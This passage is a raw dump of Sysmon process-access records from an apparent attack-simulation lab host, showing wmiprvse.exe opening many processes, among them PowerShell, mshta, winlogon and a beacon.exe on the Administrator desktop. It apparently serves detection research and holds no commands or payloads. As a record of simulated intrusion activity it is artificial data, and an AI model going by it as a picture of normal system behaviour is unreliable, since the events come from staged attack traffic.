Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237106Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.418{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237105Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.418{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237104Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.418{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237103Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.418{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237102Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.418{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237101Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.418{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237100Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.418{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237099Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.418{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237098Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.418{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237097Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.418{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237096Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.403{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237095Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.403{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237094Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.403{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237093Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.403{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237092Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.403{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237091Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.403{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237090Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.403{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237089Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.403{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237088Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.403{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237087Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 